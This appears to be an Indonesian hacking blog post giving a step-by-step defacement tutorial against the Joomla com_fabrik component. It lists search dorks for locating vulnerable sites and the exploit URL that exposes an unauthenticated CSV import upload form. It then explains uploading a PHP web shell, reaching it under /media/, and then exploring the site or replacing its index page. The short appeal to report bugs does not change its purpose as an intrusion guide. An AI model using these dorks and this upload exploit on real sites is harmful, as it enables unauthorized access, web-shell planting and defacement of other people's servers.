Kamis, 15 Juni 2017

Deface teknik com_fabrik

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/
site:inurl:index.php?option=com_fabrik&view=
site:inurl:importcsv.php site:inurl:viewTable?cid=site:com
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
Exploit: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
or
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.contoh:target.coli/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Vulnerability ~ Muncul Form Upload.. Upload Shell/File agan, Lalu Klik Import CSV4. Shell/File Akses:/media/namafileagan
contoh: target.coli/media/AttackerCyberTeam.php
Gimana Mau PhP, HTML aja masih belajar :'D
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe Jantung2" kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP Sayang :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela
*Tetap hargai para WebMaster ;*
cuma nitip file, and seng iseng saja ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Tidak ada komentar:

Posting Komentar